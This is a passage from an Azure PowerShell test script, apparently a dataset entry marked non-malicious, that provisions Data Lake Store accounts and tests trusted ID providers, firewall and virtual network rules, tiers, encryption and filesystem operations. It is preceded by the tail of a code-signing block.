AQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAx # MCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAO # BgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAK6cDppI/jygnVUP5IwX # X/tIWJMYPrPIsLcm70e0uOphirUUlZTHXQjlepTRqVxdNQVShQhQ9K995f91fQyC # h9Qb5w5d2iRocdKWjo9kgNedQKWmRGLH3EI3fvIUGlzAYvMRmUMolvaAOr8UEYLy # ydOUFIQ4GNXR4TwgJVSQ4nMgC20TFp5BYnlJ6tSvreerpfs+ZC+TU4sWXcUmhbj7 # nMqquJj88oayw5oDlmMFkTJT6jv4/eJwv/BnQbfKaVP4RriH1/erlpV0ZUF2yFhr # 9J6EaadS8YwDyPkK3biKfH5tU64X8T/YuMin6YRqvLmY5OsA1UovKbaRbd5DEX8j # 1yPzvGd2Jgfnld+tYyT1uxFOjE6lFv0SlsIHlxLIo2/FDwPTSp3ZOd1UQkWmDIEd # AlL9cQrmmh4lnmqCYIUCPhVQ8H909cd1ObVBckjdw7sNHI9RkBgzBDcqE+UzaE/Y # 58Ekiv9WwOyHezMsvZkm56uOyGHFgZVugy531o2hGOXPUxyfiISi1ri1qbbgXEPI # euoWboRRC7+kNgQOq669AUZvmCUhyTisqoGdGWtGiJGPSp2E7eeii1WD/VI/TNMs # LVGvGO5MRV7c8qsRNu29w4OgaH3XZeu1/jBszCmtryNizPOvel/T3TnPMvxvyfyS # 4wEKEFh8V2z3XopONzhMY1T1MIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJmQAA # AAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh # c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD # b3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUg # QXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1WjB8 # MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk # bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N # aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEBBQAD # ggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2 # AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhgfWpS # g0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2r # rPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/dvI2k # 45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka97aSu # eik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKRHh09 # /SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9ituqBJR # 6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyOArxC # aC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItboKaD # IV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6bMUR # HXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6tAgMB # AAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQq # p1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacbUzUZ # 6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0 # cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnkuaHRt # MBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBB # MAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2VsuP # 6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwubWlj # cm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93d3cu # bWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMu # Y3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/qXBS2 # Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03d # mLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVtI1Tk # eFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kp # icO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTpkbKp # W99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0sHrY # UP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138eW0QB # jloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJsWkB # RH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7Fx0V # iY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0dFtq # 0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQtB1V # M1izoXBm8qGCA08wggI3AgEBMIH5oYHRpIHOMIHLMQswCQYDVQQGEwJVUzETMBEG # A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj # cm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmljYSBP # cGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046OTYwMC0wNUUwLUQ5 # NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2WiIwoBATAH # BgUrDgMCGgMVAEin77FQn5/zlWudvN2RExKkGa8voIGDMIGApH4wfDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQELBQACBQDpZOkhMCIYDzIw # MjQwMTMxMTU0MzI5WhgPMjAyNDAyMDExNTQzMjlaMHYwPAYKKwYBBAGEWQoEATEu # MCwwCgIFAOlk6SECAQAwCQIBAAIBUAIB/zAHAgEAAgITcDAKAgUA6WY6oQIBADA2 # BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIB # AAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQCZpTVwaN+wO+jxP2cH+q9lpacpum6u # E8sjPzn1Vb/YD8jraCz54pCKRvAUgirR86HvDAXh4p8dMaTvEPaqKSNdPkRuv0+q # kA5EE+J9790m0Cg5liC70lDB7cTAK+rYidlmfoA42kNoOY/GQq3PYmn/yeeaS9QI # s5UM05v9lgCfkjCbRKV6cqkXtvij7nH6ZvZXcehcZHlVVcDw/9v1QELAD3aIGvIa # EtPFKPxC27zgq+8Raoebev0HPNqfj8yM2xasGnB1gfNYNdqs8r1rIq16VxLHp/5V # ebp/fcLRDpeH7uo0Uv5ogdzXyUetFLbVpz2eF5P07LxafpddvXoDYlMsMYIEDTCC # BAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAO # BgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEm # MCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHY/Esz # pR3YhRUAAQAAAdgwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsq # hkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgaS0Xc+8Ng4gsQmrs9Rf28k2lVd2c # tNfitV1pMv8ein8wgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCA64yF//AmT # d0UwATDbebu9zIt6N35r6to/EopPtrO+VDCBmDCBgKR+MHwxCzAJBgNVBAYTAlVT # MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK # ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1l # LVN0YW1wIFBDQSAyMDEwAhMzAAAB2PxLM6Ud2IUVAAEAAAHYMCIEIHHBO5GF4vs2 # xnEki+9sQj7ICNVzkG7UZLu39WJ+REuPMA0GCSqGSIb3DQEBCwUABIICACrOEpkP # rZxaQ+Wk3A59ZmGKLC69uX7tBv8Vc8Bl2apXAlkV62geHvfAM4jY0o5/I2pc6Pad # zEwz6BaNimbKSryL94vM+0use3g97DuQneLg4x9lF3I+TxmDiBPYDSVBVCqrlJnK # u7ZNr+39p/t7qDzlZJM69JsvYu73cjFFWBJsloz9kuK7kNIszvmTB9lCf5iQMvnA # 9oMDkTfJ7jKDWio6HqzmDRPd2tBkAurZGln0ZlYkg1y4fifemiH7TgzbSYft7F10 # qFelVNaPtD1WSay7a/ajL2zZ+u4Nu+1/2PripFWvkarpAl3td6KslFD7SvaDyJ7Y # JhY8EHkPJQNNhRU8ggnzTUoqvFKbSVhNNHpd3ZyizXBhPBn+iFYLWerdZNDfmSLW # R7YaqfYzc1n1ihU2Zh5FKxBdemdjeKJBBFP4Yqrool7ge9TTvr7F0OglNfhgZ4ks # 9UApPJ+IQNU7qMa7erdv2+ASlMjTS92Yx1WHgjeHinxUH5Md9oojHSeK0NjEZRfs # 6AtmrtH0qJVM5r3WDazK0JZU5e+TA29afYIQ9ulDeAeaqpJBH1u5XGNt9Tjqw+fb # 4Qn3LaJHdkNR35fzkzAX0mOrl+6gEA0V7VtaQt1shi7/+Q0tYoA0MBRmfHrJP5Dm # 0KPiqtEu4s9sCOOegRGRleEn2WzuqJYLFSQx # SIG # End signature block
combined_dataset/train/non-malicious/3724.ps1
3724.ps1
function Test-DataLakeStoreTrustedIdProvider { param ( $location ) if ([string]::IsNullOrEmpty($location)) { $location = Get-Location -providerNamespace "Microsoft.CognitiveServices" -resourceType "accounts" -preferredLocation "West US"; } try { $resourceGroupName = Get-ResourceGroupName $accountName = Get-DataLakeStoreAccountName New-AzResourceGroup -Name $resourceGroupName -Location $location Assert-False {Test-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} Assert-False {Test-AzDataLakeStoreAccount -Name $accountName} $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location -Encryption ServiceManaged Assert-AreEqual $accountName $accountCreated.Name Assert-AreEqual $location $accountCreated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountCreated.Type Assert-True {$accountCreated.Id -like "*$resourceGroupName*"} for ($i = 0; $i -le 60; $i++) { [array]$accountGet = Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName if ($accountGet[0].ProvisioningState -like "Succeeded") { Assert-AreEqual $accountName $accountGet[0].Name Assert-AreEqual $location $accountGet[0].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountGet[0].Type Assert-True {$accountGet[0].Id -like "*$resourceGroupName*"} break } Write-Host "account not yet provisioned. current state: $($accountGet[0].ProvisioningState)" [Microsoft.WindowsAzure.Commands.Utilities.Common.TestMockSupport]::Delay(30000) Assert-False {$i -eq 60} " Data Lake Store account is not in succeeded state even after 30 min." } Assert-True {Test-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} Assert-AreEqual "Disabled" $accountCreated.TrustedIdProviderState $accountSet = Set-AzDataLakeStoreAccount -Name $accountName -TrustedIdProviderState Enabled Assert-AreEqual "Enabled" $accountSet.TrustedIdProviderState $trustedIdName = getAssetName $trustedIdEndpoint = "https://sts.windows.net/6b04908c-b91f-40ce-8024-7ee8a4fd6150" Add-AzDataLakeStoreTrustedIdProvider -AccountName $accountName -Name $trustedIdName -ProviderEndpoint $trustedIdEndpoint $result = Get-AzDataLakeStoreTrustedIdProvider -AccountName $accountName -Name $trustedIdName Assert-AreEqual $trustedIdName $result.Name Assert-AreEqual $trustedIdEndpoint $result.IdProvider Remove-AzDataLakeStoreTrustedIdProvider -AccountName $accountName -Name $trustedIdName Assert-Throws {Get-AzDataLakeStoreTrustedIdProvider -AccountName $accountName -Name $trustedIdName} } finally { Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzResourceGroup -Name $resourceGroupName -Force -ErrorAction SilentlyContinue} -IgnoreFailures } } function Test-DataLakeStoreFirewall { param ( $location ) if ([string]::IsNullOrEmpty($location)) { $location = Get-Location -providerNamespace "Microsoft.CognitiveServices" -resourceType "accounts" -preferredLocation "West US"; } try { $resourceGroupName = Get-ResourceGroupName $accountName = Get-DataLakeStoreAccountName New-AzResourceGroup -Name $resourceGroupName -Location $location Assert-False {Test-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} Assert-False {Test-AzDataLakeStoreAccount -Name $accountName} $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location -Encryption ServiceManaged Assert-AreEqual $accountName $accountCreated.Name Assert-AreEqual $location $accountCreated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountCreated.Type Assert-True {$accountCreated.Id -like "*$resourceGroupName*"} for ($i = 0; $i -le 60; $i++) { [array]$accountGet = Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName if ($accountGet[0].ProvisioningState -like "Succeeded") { Assert-AreEqual $accountName $accountGet[0].Name Assert-AreEqual $location $accountGet[0].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountGet[0].Type Assert-True {$accountGet[0].Id -like "*$resourceGroupName*"} break } Write-Host "account not yet provisioned. current state: $($accountGet[0].ProvisioningState)" [Microsoft.WindowsAzure.Commands.Utilities.Common.TestMockSupport]::Delay(30000) Assert-False {$i -eq 60} " Data Lake Store account is not in succeeded state even after 30 min." } Assert-True {Test-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} Assert-AreEqual "Disabled" $accountCreated.FirewallState $accountSet = Set-AzDataLakeStoreAccount -Name $accountName -FirewallState "Enabled" -AllowAzureIpState "Enabled" Assert-AreEqual "Enabled" $accountSet.FirewallState $firewallRuleName = getAssetName $startIp = "127.0.0.1" $endIp = "127.0.0.2" Add-AzDataLakeStoreFirewallRule -AccountName $accountName -Name $firewallRuleName -StartIpAddress $startIp -EndIpAddress $endIp $result = Get-AzDataLakeStoreFirewallRule -AccountName $accountName -Name $firewallRuleName Assert-AreEqual $firewallRuleName $result.Name Assert-AreEqual $startIp $result.StartIpAddress Assert-AreEqual $endIp $result.EndIpAddress Remove-AzDataLakeStoreFirewallRule -AccountName $accountName -Name $firewallRuleName Assert-Throws {Get-AzDataLakeStoreFirewallRule -AccountName $accountName -Name $firewallRuleName} } finally { Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzResourceGroup -Name $resourceGroupName -Force -ErrorAction SilentlyContinue} -IgnoreFailures } } function Test-DataLakeStoreVirtualNetwork { param ( $location ) if ([string]::IsNullOrEmpty($location)) { $location = Get-Location -providerNamespace "Microsoft.CognitiveServices" -resourceType "accounts" -preferredLocation "West US"; } try { $resourceGroupName = Get-ResourceGroupName $accountName = Get-DataLakeStoreAccountName New-AzResourceGroup -Name $resourceGroupName -Location $location Assert-False {Test-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} Assert-False {Test-AzDataLakeStoreAccount -Name $accountName} $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location -Encryption ServiceManaged Assert-AreEqual $accountName $accountCreated.Name Assert-AreEqual $location $accountCreated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountCreated.Type Assert-True {$accountCreated.Id -like "*$resourceGroupName*"} for ($i = 0; $i -le 60; $i++) { [array]$accountGet = Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName if ($accountGet[0].ProvisioningState -like "Succeeded") { Assert-AreEqual $accountName $accountGet[0].Name Assert-AreEqual $location $accountGet[0].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountGet[0].Type Assert-True {$accountGet[0].Id -like "*$resourceGroupName*"} break } Write-Host "account not yet provisioned. current state: $($accountGet[0].ProvisioningState)" [Microsoft.WindowsAzure.Commands.Utilities.Common.TestMockSupport]::Delay(30000) Assert-False {$i -eq 60} " Data Lake Store account is not in succeeded state even after 30 min." } Assert-True {Test-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} Assert-AreEqual "Disabled" $accountCreated.FirewallState $accountSet = Set-AzDataLakeStoreAccount -Name $accountName -FirewallState "Enabled" -AllowAzureIpState "Enabled" Assert-AreEqual "Enabled" $accountSet.FirewallState $virtualNetworkRuleName = getAssetName $vnetName1 = "vnet1" $virtualNetwork1 = CreateAndGetVirtualNetwork $resourceGroupName $vnetName1 $location $virtualNetworkSubnetId1 = $virtualNetwork1.Subnets[0].Id $vnetName2 = "vnet2" $virtualNetwork2 = CreateAndGetVirtualNetwork $resourceGroupName $vnetName2 $location $virtualNetworkSubnetId2 = $virtualNetwork2.Subnets[0].Id Add-AzDataLakeStoreVirtualNetworkRule -Account $accountName -Name $vnetName1 -SubnetId $virtualNetworkSubnetId1 $result = Get-AzDataLakeStoreVirtualNetworkRule -Account $accountName -Name $vnetName1 Assert-AreEqual $vnetName1 $result.VirtualNetworkRuleName Assert-AreEqual $virtualNetworkSubnetId1 $result.VirtualNetworkSubnetId Remove-AzDataLakeStoreVirtualNetworkRule -Account $accountName -Name $vnetName1 Assert-Throws {Get-AzDataLakeStoreVirtualNetworkRule -Account $accountName -Name $vnetName1} } finally { Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzResourceGroup -Name $resourceGroupName -Force -ErrorAction SilentlyContinue} -IgnoreFailures } } function Test-DataLakeStoreAccountTiers { param ( $location ) if ([string]::IsNullOrEmpty($location)) { $location = Get-Location -providerNamespace "Microsoft.CognitiveServices" -resourceType "accounts" -preferredLocation "West US"; } try { $resourceGroupName = Get-ResourceGroupName $accountName = Get-DataLakeStoreAccountName $secondAccountName = Get-DataLakeStoreAccountName New-AzResourceGroup -Name $resourceGroupName -Location $location Assert-False {Test-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} Assert-False {Test-AzDataLakeStoreAccount -Name $accountName} $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location Assert-AreEqual $accountName $accountCreated.Name Assert-AreEqual $location $accountCreated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountCreated.Type Assert-True {$accountCreated.Id -like "*$resourceGroupName*"} Assert-AreEqual "Consumption" $accountCreated.CurrentTier Assert-AreEqual "Consumption" $accountCreated.NewTier $accountUpdated = Set-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Tier Commitment1TB Assert-AreEqual "Consumption" $accountUpdated.CurrentTier Assert-AreEqual "Commitment1TB" $accountUpdated.NewTier $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $secondAccountName -Location $location -Tier Commitment1TB Assert-AreEqual "Commitment1TB" $accountCreated.CurrentTier Assert-AreEqual "Commitment1TB" $accountCreated.NewTier } finally { Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $secondAccountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzResourceGroup -Name $resourceGroupName -Force -ErrorAction SilentlyContinue} -IgnoreFailures } } function Test-DataLakeStoreAccount { param ( $location ) if ([string]::IsNullOrEmpty($location)) { $location = Get-Location -providerNamespace "Microsoft.CognitiveServices" -resourceType "accounts" -preferredLocation "West US"; } try { $resourceGroupName = Get-ResourceGroupName $accountName = Get-DataLakeStoreAccountName New-AzResourceGroup -Name $resourceGroupName -Location $location Assert-False {Test-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} Assert-False {Test-AzDataLakeStoreAccount -Name $accountName} $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location -Encryption ServiceManaged Assert-AreEqual $accountName $accountCreated.Name Assert-AreEqual $location $accountCreated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountCreated.Type Assert-True {$accountCreated.Id -like "*$resourceGroupName*"} for ($i = 0; $i -le 60; $i++) { [array]$accountGet = Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName if ($accountGet[0].ProvisioningState -like "Succeeded") { Assert-AreEqual $accountName $accountGet[0].Name Assert-AreEqual $location $accountGet[0].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountGet[0].Type Assert-True {$accountGet[0].Id -like "*$resourceGroupName*"} Assert-True {$accountGet[0].Identity -ne $null} Assert-True {$accountGet[0].EncryptionConfig -ne $null} break } Write-Host "account not yet provisioned. current state: $($accountGet[0].ProvisioningState)" [Microsoft.WindowsAzure.Commands.Utilities.Common.TestMockSupport]::Delay(30000) Assert-False {$i -eq 60} " Data Lake Store account is not in succeeded state even after 30 min." } Assert-True {Test-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} Assert-True {Test-AzDataLakeStoreAccount -Name $accountName} $tagsToUpdate = @{"TestTag" = "TestUpdate"} $accountUpdated = Set-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Tag $tagsToUpdate Assert-AreEqual $accountName $accountUpdated.Name Assert-AreEqual $location $accountUpdated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountUpdated.Type Assert-True {$accountUpdated.Id -like "*$resourceGroupName*"} Assert-NotNull $accountUpdated.Tags "Tags do not exists" Assert-NotNull $accountUpdated.Tags["TestTag"] "The updated tag 'TestTag' does not exist" [array]$accountsInResourceGroup = Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName Assert-True {$accountsInResourceGroup.Count -ge 1} $found = 0 for ($i = 0; $i -lt $accountsInResourceGroup.Count; $i++) { if ($accountsInResourceGroup[$i].Name -eq $accountName) { $found = 1 Assert-AreEqual $location $accountsInResourceGroup[$i].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountsInResourceGroup[$i].Type Assert-True {$accountsInResourceGroup[$i].Id -like "*$resourceGroupName*"} break } } Assert-True {$found -eq 1} "Account created earlier is not found when listing all in resource group: $resourceGroupName." [array]$accountsInSubscription = Get-AzDataLakeStoreAccount Assert-True {$accountsInSubscription.Count -ge 1} Assert-True {$accountsInSubscription.Count -ge $accountsInResourceGroup.Count} $found = 0 for ($i = 0; $i -lt $accountsInSubscription.Count; $i++) { if ($accountsInSubscription[$i].Name -eq $accountName) { $found = 1 Assert-AreEqual $location $accountsInSubscription[$i].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountsInSubscription[$i].Type Assert-True {$accountsInSubscription[$i].Id -like "*$resourceGroupName*"} break } } Assert-True {$found -eq 1} "Account created earlier is not found when listing all in subscription." $secondAccountName = Get-DataLakeStoreAccountName $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $secondAccountName -Location $location Assert-True {$accountCreated.EncryptionConfig -ne $null} Assert-AreEqual "ServiceManaged" $accountCreated.EncryptionConfig.Type Assert-AreEqual "Enabled" $accountCreated.EncryptionState Assert-Throws {Enable-AzDataLakeStoreKeyVault -ResourceGroupName $resourceGroupName -Account $secondAccountName} $thirdAccountName = Get-DataLakeStoreAccountName $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $thirdAccountName -Location $location -DisableEncryption Assert-True {[string]::IsNullOrEmpty(($accountCreated.EncryptionConfig.Type))} Assert-AreEqual "Disabled" $accountCreated.EncryptionState Assert-True {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -PassThru} "Remove Account failed." Assert-Throws {Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName} } finally { Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $secondAccountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $thirdAccountName -Force -ErrorAction SilentlyContinue} -IgnoreFailures Invoke-HandledCmdlet -Command {Remove-AzResourceGroup -Name $resourceGroupName -Force -ErrorAction SilentlyContinue} -IgnoreFailures } } function Test-DataLakeStoreFileSystem { param ( $fileToCopy, $location ) if ([string]::IsNullOrEmpty($location)) { $location = Get-Location -providerNamespace "Microsoft.CognitiveServices" -resourceType "accounts" -preferredLocation "West US"; } try { $resourceGroupName = Get-ResourceGroupName $accountName = Get-DataLakeStoreAccountName New-AzResourceGroup -Name $resourceGroupName -Location $location $accountCreated = New-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName -Location $location -DisableEncryption Assert-AreEqual $accountName $accountCreated.Name Assert-AreEqual $location $accountCreated.Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountCreated.Type Assert-True {$accountCreated.Id -like "*$resourceGroupName*"} for ($i = 0; $i -le 60; $i++) { [array]$accountGet = Get-AzDataLakeStoreAccount -ResourceGroupName $resourceGroupName -Name $accountName if ($accountGet[0].ProvisioningState -like "Succeeded") { Assert-AreEqual $accountName $accountGet[0].Name Assert-AreEqual $location $accountGet[0].Location Assert-AreEqual "Microsoft.DataLakeStore/accounts" $accountGet[0].Type Assert-True {$accountGet[0].Id -like "*$resourceGroupName*"} break } Write-Host "account not yet provisioned. current state: $($accountGet[0].ProvisioningState)" [Microsoft.WindowsAzure.Commands.Utilities.Common.TestMockSupport]::Delay(30000) Assert-False {$i -eq 60} " Data Lake Store account is not in succeeded state even after 30 min." } $encodingFolder="/encodingFolder" $folderToCreate = "/adlspstestfolder" $emptyFilePath = "$folderToCreate\emptyfile.txt" $contentFilePath = "$folderToCreate/contentfile.txt" $unicodeContentFilePath="$encodingFolder/unicodecontentfile.txt" $unicodetext="I am unicode text" $utf32ContentFilePath="$encodingFolder/utf32contentfile.txt" $utf32text="I am utf32 text" $concatFile = "$folderToCreate/concatfile.txt" $moveFile = "$folderToCreate/movefile.txt" $movefolder = "/adlspstestmovefolder" $importFile = "$folderToCreate/importfile.txt" $content = "Test file content! @ Azure PsTest01?" $summaryFolder="/adlspstestsummaryfolder" $subFolderToCreate = "$summaryFolder/Folder0" $subSubFolderToCreate = "$summaryFolder/Folder0/SubFolder0" $subFileToCreate = "$summaryFolder/File0" $result = New-AzDataLakeStoreItem -Account $accountName -path $folderToCreate -Folder Assert-NotNull $result "No value was returned on folder creation" $result = Get-AzDataLakeStoreItem -Account $accountName -path $folderToCreate Assert-NotNull $result "No value was returned on folder get" Assert-AreEqual "Directory" $result.Type $result = New-AzDataLakeStoreItem -Account $accountName -path $emptyFilePath Assert-NotNull $result "No value was returned on empty file creation" $result = Get-AzDataLakeStoreItem -Account $accountName -path 